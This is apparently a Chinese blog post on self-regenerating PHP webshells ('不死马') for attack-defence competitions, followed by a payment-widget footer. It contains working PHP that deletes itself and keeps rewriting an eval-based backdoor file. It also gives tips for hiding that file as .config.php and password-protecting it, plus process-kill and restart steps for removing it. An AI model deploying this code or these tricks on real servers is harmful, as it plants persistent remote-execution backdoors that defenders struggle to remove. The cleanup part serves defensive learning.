不死马

不死马感觉挺有用的,先了解了解,早晚会用到

先来了解下不死马“不死”的原理

不死马与普通一句话的区别在于,不死马本身并不是用来连接的,而是创建一个不断生成另一个一句话的进程,我们需要连接的是另一个被创建出来的一句话木马文件

来看一个普通的不死马

<?php
set_time_limit(0);                          //用来让这个php文件能永久执行,否则会有超时时间
ignore_user_abort(1);                       //让客户端只连接一次就能一直运行,否则客户端关闭页面就会停止
unlink(__FILE__);                           //把自身文件删除
while (1) {
$content = '<?php @eval($_POST["cmd"]); ?>';//设置一句话
file_put_contents("shell.php", $content);   //将一句话写入到文件中
usleep(10000);                              //间隔时间
}
?>

这里的usleep的单位很离谱

现在上虚拟机里试试

 写好后这边访问一下,可以看到1.php不见了,shell.php被创建了,而且删不掉

 那该怎么删呢

最方便的应该是这样吧:

 直接写个脚本删除同时创建相同名称文件夹(整完想起来直接用&&执行命令不是更快)

网页这边能够看到效果:

 但是这个进程依旧是存在的,在1.php这里能够看到它依然在不断尝试写马

网上用的命令是这样的:ps aux|grep www-data|awk '{print 2}'| xargs kill -9

杀死所有www的进程,但是不知道为什么用了之后还是不好使,最后重启了下apache好了:apache2 restart

也不知道php执行脚本执行到哪去了,在ps里没看到,可能是在这几个www 的里面

 就是不知道为什么杀进程不好使,待会再研究

到这里大概了解了普通的不死马原理以及一般的防护手段,下面就应该对它进行一些改造

首先就是把要写的一句话的文件名伪装起来,比如常用的有伪装成.config.php的

不加-a看不到,而且名字也能有些迷惑性,或者其他一些看起来比较有迷惑性的名称

然后是防止其他队搭顺风车的手段

比如这里在连接的时候需要加个?passwd=shell

这里顺带说一嘴md5,它是无法被还原出明文的,因为它是一种摘要算法

它会将任何长度的字符串通过计算后转化成固定长度的字符串,不管你的小电影有几百个T都一样(乐)

而验证的方式就是再计算一边,如果两个结果对上了那就通过了

不过即使是这种方式如果密码设置的太简单也经常会遭重

 看这第一位很大可能是对的

具体的可以看看这篇文章:https://blog.csdn.net/qq_35387940/article/details/129749096

然后应该就剩下一句话本身的变形了,这个跟不死马关系不大,就不在这写了

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值